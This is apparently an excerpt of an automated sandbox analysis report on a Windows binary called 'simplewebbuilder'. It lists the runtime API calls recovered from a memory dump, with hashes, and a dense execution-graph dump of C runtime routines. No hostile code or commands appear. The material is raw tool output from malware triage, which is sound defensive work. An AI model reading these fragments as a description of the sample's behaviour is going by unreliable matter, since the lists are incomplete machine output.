                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406A95
                                                                                                                            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406AA7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 3852931651-3990396050
                                                                                                                            • Opcode ID: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                            • Instruction ID: 163a86b768802ebad6552dab4735af5f1520240db88ca7a198a85c033bcdd74c
                                                                                                                            • Opcode Fuzzy Hash: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                            • Instruction Fuzzy Hash: 28418D71600209AFCF209F94CD86EAF3B69FB05750F11453AFA12B2290C7398D649B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040530A
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004053E0
                                                                                                                            • WriteFile.KERNEL32(00000000), ref: 004053E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                            • API String ID: 3784150691-4022980321
                                                                                                                            • Opcode ID: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                            • Instruction ID: 92436d38ab3050e8b35fbc92b936da31f470892ba1b2a307495bbf6c2249caee
                                                                                                                            • Opcode Fuzzy Hash: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                            • Instruction Fuzzy Hash: 54318372600618AEDB20A660CE4AF9B776CEB45344F5004BFF945B61C1EAB8AA448F5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DCF
                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DE3
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E0F
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E47
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E69
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403196), ref: 00404E82
                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E95
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404ED3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1823725401-0
                                                                                                                            • Opcode ID: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                            • Instruction ID: 56fc3daba095db5e8e6f62c072fe8221d0ae9ee3e10054882f672288d86757d0
                                                                                                                            • Opcode Fuzzy Hash: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                            • Instruction Fuzzy Hash: 8E31CDF25042555EDB206BA4DD8483BB69CFB85358716093BF782E3280EA798C5186E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 564119183-0
                                                                                                                            • Opcode ID: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction ID: a90e581a73a4811956ae2efad35f221ca7a2e3ffda059466d66554c94119bb76
                                                                                                                            • Opcode Fuzzy Hash: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction Fuzzy Hash: 21316E31A00355AFDB115FB49F889AF7B78EB45344B10807AFE86F72C1DA748845C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403356
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004033B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                            • API String ID: 1385375860-4131005785
                                                                                                                            • Opcode ID: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction ID: 4b08c86a7d9428a74474774e457b3a663dfcff145a9399c9a999905afefb3de6
                                                                                                                            • Opcode Fuzzy Hash: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction Fuzzy Hash: 5331287190129869EB328B705C856DA3F6C9B02709F2404FFD544FA2C2DA789F868B19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00404F3F
                                                                                                                            • GetFileType.KERNEL32(00000800), ref: 00404FE5
                                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040503E
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0040504C
                                                                                                                            • SetHandleCount.KERNEL32 ref: 00405083
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1710529072-0
                                                                                                                            • Opcode ID: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                            • Instruction ID: 0a81f0dcc5ba0bfdc0506c3f5ccff14beb01dd10c6f3c9adb059a1ad3e4abaaf
                                                                                                                            • Opcode Fuzzy Hash: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                            • Instruction Fuzzy Hash: B851377190460A8BD7208F38CE8476B3B90EB51724F19473EE5A2F72E1D7389845CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,7U@ ,?,00000000,00000000,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CD0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction ID: 3fc6234a2594f0c7c4f8fd7f4d61d5b765ea0d6a512059466152f22e4b19d7c1
                                                                                                                            • Opcode Fuzzy Hash: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction Fuzzy Hash: 2A112832900209ABDF228F94CE44ADEBBB6FF48350F154166FA61722A0D736CD71DB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004030CC), ref: 00404371
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404381
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                            • Opcode ID: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction ID: ae1f0f37a1caea7582e622d33e18e97b99b5337afe9bfc2040585345cf76d9d0
                                                                                                                            • Opcode Fuzzy Hash: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction Fuzzy Hash: A4C012B0780701A2EA201BB02F0AB1622280B80F02F16243EAB8DF08C2CE7CD805A42D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403490), ref: 00403D19
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403490), ref: 00403D3D
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403490), ref: 00403D57
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403490), ref: 00403E18
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403490), ref: 00403E2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 714016831-0
                                                                                                                            • Opcode ID: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction ID: 82e4f5ca211df2534f48b16e1633463362d6e61a1909367565888a0a16669b2c
                                                                                                                            • Opcode Fuzzy Hash: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction Fuzzy Hash: 2331E370601706ABE3308F24DD49B22BBA8EB48756F14463BE555BB7E1E778AD40CB4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00406596
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                                            • Opcode ID: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction ID: ecf7deb6fed8900c4d79a36e1d1ce5f6dbda1fd4730ae83dc28ca19186aff87e
                                                                                                                            • Opcode Fuzzy Hash: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction Fuzzy Hash: 4D415B31000258AAEB119718DD99BFB3FE8DB01700F1505F6D547F71D2C37A49A4CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403B74
                                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BA8
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BC2
                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BD9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3499195154-0
                                                                                                                            • Opcode ID: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction ID: fcdd260894a6eddc8adf86aaa2b40ca1807c17f8388b21482d04f48ace73d9e8
                                                                                                                            • Opcode Fuzzy Hash: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction Fuzzy Hash: 1B111630300206DFD720CF28EE85A227BB6FB897557104B39E592E69A1D771A945CF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage: 8.1%
                                                                                                                            Dynamic/Decrypted Code Coverage: 84.3%
                                                                                                                            Signature Coverage: 5.6%
                                                                                                                            Total number of Nodes: 2000
                                                                                                                            Total number of Limit Nodes: 53
9cfb17 18801->18806 18803 9c645b strtoxl 59 API calls 18802->18803 18808 9cfaf5 18803->18808 18804 9c54f5 strtoxl 9 API calls 18805 9c8e47 18804->18805 18805->18738 18805->18751 18806->18805 18807 9c645b strtoxl 59 API calls 18806->18807 18807->18808 18808->18804 18810 9d07f2 ___crtIsPackagedApp 18809->18810 18811 9d08b1 IsDebuggerPresent 18810->18811 18812 9d0801 LoadLibraryExW 18810->18812 18813 9d08bb 18811->18813 18814 9d08d6 18811->18814 18815 9d083e GetProcAddress 18812->18815 18816 9d0818 GetLastError 18812->18816 18817 9d08c9 18813->18817 18818 9d08c2 OutputDebugStringW 18813->18818 18814->18817 18819 9d08db RtlDecodePointer 18814->18819 18821 9d0852 7 API calls 18815->18821 18822 9d08ce 18815->18822 18820 9d0827 LoadLibraryExW 18816->18820 18816->18822 18817->18822 18823 9d091a 18817->18823 18828 9d0902 RtlDecodePointer RtlDecodePointer 18817->18828 18818->18817 18819->18822 18820->18815 18820->18822 18824 9d08ae 18821->18824 18825 9d089a GetProcAddress RtlEncodePointer 18821->18825 18826 9c4b4b ___strgtold12_l 6 API calls 18822->18826 18827 9d0952 RtlDecodePointer 18823->18827 18833 9d093e RtlDecodePointer 18823->18833 18824->18811 18825->18824 18829 9d09a0 18826->18829 18831 9d0959 18827->18831 18827->18833 18828->18823 18829->18757 18832 9d096a RtlDecodePointer 18831->18832 18831->18833 18832->18833 18833->18822 18835 9c4b55 IsProcessorFeaturePresent 18834->18835 18836 9c4b53 18834->18836 18838 9c9b8f 18835->18838 18836->18727 18876 9c9b3e IsDebuggerPresent 18838->18876 18842 9c5510 18841->18842 18884 9c5398 18842->18884 18846 9c552b 18846->18743 18847 9c8f75 18846->18847 18848 9c8f81 CallCatchBlock 18847->18848 18849 9c8fa0 18848->18849 18850 9c8cd3 __FF_MSGBANNER 59 API calls 18848->18850 18851 9c90b4 __malloc_crt 59 API calls 18849->18851 18858 9c8fc3 CallCatchBlock 18849->18858 18852 9c8f8f 18850->18852 18854 9c8fb7 18851->18854 18853 9c8d30 __NMSG_WRITE 59 API calls 18852->18853 18855 9c8f96 18853->18855 18856 9c8fcd 18854->18856 18857 9c8fbe 
18854->18857 18859 9c891c _malloc 3 API calls 18855->18859 18893 9c8eed 18856->18893 18860 9c645b strtoxl 59 API calls 18857->18860 18858->18748 18859->18849 18860->18858 18862 9c8fd4 18863 9c8ff9 18862->18863 18864 9c8fe1 18862->18864 18865 9c3574 _free 59 API calls 18863->18865 18866 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 18864->18866 18867 9c8fed 18865->18867 18866->18867 18900 9c9015 18867->18900 18870 9c8cd3 __FF_MSGBANNER 59 API calls 18869->18870 18871 9c8a47 18870->18871 18872 9c8d30 __NMSG_WRITE 59 API calls 18871->18872 18873 9c8a4f 18872->18873 18904 9c8aee 18873->18904 18877 9c9b53 __call_reportfault 18876->18877 18882 9c9b28 SetUnhandledExceptionFilter UnhandledExceptionFilter 18877->18882 18879 9c9b5b __call_reportfault 18883 9c9b13 GetCurrentProcess TerminateProcess 18879->18883 18881 9c9b78 18881->18727 18882->18879 18883->18881 18885 9c53b2 _memset __call_reportfault 18884->18885 18886 9c53d2 IsDebuggerPresent 18885->18886 18892 9c9b28 SetUnhandledExceptionFilter UnhandledExceptionFilter 18886->18892 18888 9c4b4b ___strgtold12_l 6 API calls 18890 9c54b9 18888->18890 18889 9c5496 __call_reportfault 18889->18888 18891 9c9b13 GetCurrentProcess TerminateProcess 18890->18891 18891->18846 18892->18889 18894 9c8efe 18893->18894 18895 9c8f11 RtlEnterCriticalSection 18893->18895 18896 9c8f75 __mtinitlocknum 58 API calls 18894->18896 18895->18862 18897 9c8f04 18896->18897 18897->18895 18898 9c8a3f __amsg_exit 58 API calls 18897->18898 18899 9c8f10 18898->18899 18899->18895 18903 9c9057 RtlLeaveCriticalSection 18900->18903 18907 9c8ba4 18904->18907 18908 9c8bb0 CallCatchBlock 18907->18908 18909 9c8eed __lock 52 API calls 18908->18909 18928 9c8913 ExitProcess 18927->18928 18929 9c8901 GetProcAddress 18927->18929 18929->18928 18931 9c97cb __CRT_INIT@12 TlsGetValue 18930->18931 18932 9c6287 18931->18932 18933 9c62d5 SetLastError 18932->18933 18934 9c906c __calloc_crt 56 API calls 18932->18934 18933->18765 18935 9c629a 18934->18935 
18935->18933 18936 9c97ea __CRT_INIT@12 TlsSetValue 18935->18936 18937 9c62ae 18936->18937 18938 9c62cc 18937->18938 18939 9c62b4 18937->18939 18941 9c3574 _free 56 API calls 18938->18941 18940 9c62e1 __initptd 56 API calls 18939->18940 18942 9c62bc GetCurrentThreadId 18940->18942 18943 9c62d2 18941->18943 18942->18933 18943->18933 18947 9c9057 RtlLeaveCriticalSection 18944->18947 18946 9cbb7d 18946->18549 18947->18946 18950 9cbca6 18948->18950 18953 9cbd0a 18950->18953 18958 9d1bd6 18950->18958 18951 9cbc27 18951->18568 18951->18571 18952 9d1bd6 _parse_cmdline 59 API calls 18952->18953 18953->18951 18953->18952 18955 9c589a 18954->18955 18956 9c5893 18954->18956 18955->18563 19014 9c5be7 18956->19014 18961 9d1b7c 18958->18961 18964 9c287b 18961->18964 18965 9c288c 18964->18965 18969 9c28d9 18964->18969 18972 9c625a 18965->18972 18967 9c2892 18968 9c28b9 18967->18968 18977 9c57bf 18967->18977 18968->18969 18992 9c5b41 18968->18992 18969->18950 18973 9c6272 __getptd_noexit 59 API calls 18972->18973 18974 9c6260 18973->18974 18975 9c626d 18974->18975 18976 9c8a3f __amsg_exit 59 API calls 18974->18976 18975->18967 18976->18975 18978 9c57cb CallCatchBlock 18977->18978 18979 9c625a CallCatchBlock 59 API calls 18978->18979 18980 9c57d4 18979->18980 18981 9c5803 18980->18981 18983 9c57e7 18980->18983 18982 9c8eed __lock 59 API calls 18981->18982 18984 9c580a 18982->18984 18985 9c625a CallCatchBlock 59 API calls 18983->18985 19004 9c583f 18984->19004 18987 9c57ec 18985->18987 18990 9c8a3f __amsg_exit 59 API calls 18987->18990 18991 9c57fa CallCatchBlock 18987->18991 18990->18991 18991->18968 18993 9c5b4d CallCatchBlock 18992->18993 18994 9c625a CallCatchBlock 59 API calls 18993->18994 18995 9c5b57 18994->18995 18996 9c8eed __lock 59 API calls 18995->18996 19001 9c5b69 18995->19001 18997 9c5b87 18996->18997 19002 9c3574 _free 59 API calls 18997->19002 19003 9c5bb4 18997->19003 18999 9c8a3f __amsg_exit 59 API calls 19000 9c5b77 CallCatchBlock 18999->19000 19000->18969 
19001->18999 19001->19000 19002->19003 19011 9c5bde 19003->19011 19005 9c584a ___addlocaleref ___removelocaleref 19004->19005 19007 9c581e 19004->19007 19006 9c55c5 ___freetlocinfo 59 API calls 19005->19006 19005->19007 19006->19007 19008 9c5836 19007->19008 19009 9c9057 _doexit RtlLeaveCriticalSection 19008->19009 19010 9c583d 19009->19010 19010->18987 19012 9c9057 _doexit RtlLeaveCriticalSection 19011->19012 19013 9c5be5 19012->19013 19013->19001 19015 9c5bf3 CallCatchBlock 19014->19015 19016 9c625a CallCatchBlock 59 API calls 19015->19016 19017 9c5bfb 19016->19017 19018 9c5b41 _LocaleUpdate::_LocaleUpdate 59 API calls 19017->19018 19019 9c5c05 19018->19019 19039 9c58e2 19019->19039 19022 9c90b4 __malloc_crt 59 API calls 19024 9c5c27 19022->19024 19023 9c5d54 CallCatchBlock 19023->18955 19024->19023 19046 9c5d8f 19024->19046 19027 9c5c5d 19029 9c5c7d 19027->19029 19031 9c3574 _free 59 API calls 19027->19031 19028 9c5d64 19028->19023 19030 9c5d77 19028->19030 19032 9c3574 _free 59 API calls 19028->19032 19029->19023 19034 9c8eed __lock 59 API calls 19029->19034 19033 9c645b strtoxl 59 API calls 19030->19033 19031->19029 19032->19030 19033->19023 19035 9c5cac 19034->19035 19036 9c5d3a 19035->19036 19038 9c3574 _free 59 API calls 19035->19038 19056 9c5d59 19036->19056 19038->19036 19040 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 19039->19040 19041 9c58f2 19040->19041 19042 9c5901 GetOEMCP 19041->19042 19043 9c5913 19041->19043 19044 9c592a 19042->19044 19043->19044 19045 9c5918 GetACP 19043->19045 19044->19022 19044->19023 19045->19044 19047 9c58e2 getSystemCP 61 API calls 19046->19047 19048 9c5dac 19047->19048 19051 9c5dfd IsValidCodePage 19048->19051 19053 9c5db3 setSBCS 19048->19053 19055 9c5e22 _memset __setmbcp_nolock 19048->19055 19049 9c4b4b ___strgtold12_l 6 API calls 19050 9c5c4e 19049->19050 19050->19027 19050->19028 19052 9c5e0f GetCPInfo 19051->19052 19051->19053 19052->19053 19052->19055 19053->19049 19059 9c59af GetCPInfo 19055->19059 19117 
9c9057 RtlLeaveCriticalSection 19056->19117 19058 9c5d60 19058->19023 19060 9c5a91 19059->19060 19066 9c59e7 19059->19066 19063 9c4b4b ___strgtold12_l 6 API calls 19060->19063 19065 9c5b3d 19063->19065 19065->19053 19069 9ce21d 19066->19069 19070 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 19069->19070 19071 9ce22e 19070->19071 19079 9ce125 19071->19079 19074 9ce0c1 19075 9c287b _LocaleUpdate::_LocaleUpdate 59 API calls 19074->19075 19076 9ce0d2 19075->19076 19092 9cdebd 19076->19092 19080 9ce14c MultiByteToWideChar 19079->19080 19081 9ce13f 19079->19081 19083 9ce178 19080->19083 19091 9ce171 19080->19091 19081->19080 19082 9c4b4b ___strgtold12_l 6 API calls 19084 9c5a48 19082->19084 19085 9ce19a _memset 19083->19085 19087 9c35ac _malloc 59 API calls 19083->19087 19084->19074 19086 9ce1d6 MultiByteToWideChar 19085->19086 19085->19091 19088 9ce200 19086->19088 19089 9ce1f0 GetStringTypeW 19086->19089 19087->19085 19090 9ce107 __freea 59 API calls 19088->19090 19089->19088 19090->19091 19091->19082 19117->19058 19119 9c72d5 19118->19119 19120 9c72c7 19118->19120 19121 9c645b strtoxl 59 API calls 19119->19121 19120->19119 19125 9c72eb 19120->19125 19122 9c72dc 19121->19122 19123 9c54f5 strtoxl 9 API calls 19122->19123 19124 9c72e6 19123->19124 19124->18584 19125->19124 19126 9c645b strtoxl 59 API calls 19125->19126 19126->19122 19128 9cd8e2 RtlEncodePointer 19127->19128 19128->19128 19129 9cd8fc 19128->19129 19129->18591 19133 9c38a8 19130->19133 19132 9c39af 19132->18593 19134 9c38b4 CallCatchBlock 19133->19134 19141 9c8b92 19134->19141 19140 9c38db CallCatchBlock 19140->19132 19142 9c8eed __lock 59 API calls 19141->19142 19143 9c38bd 19142->19143 19144 9c38ec RtlDecodePointer RtlDecodePointer 19143->19144 19145 9c3919 19144->19145 19146 9c38c9 19144->19146 19145->19146 19158 9c975d 19145->19158 19155 9c38e6 19146->19155 19148 9c397c RtlEncodePointer RtlEncodePointer 19148->19146 19149 9c392b 19149->19148 19150 9c3950 19149->19150 19165 9c90fb 19149->19165 
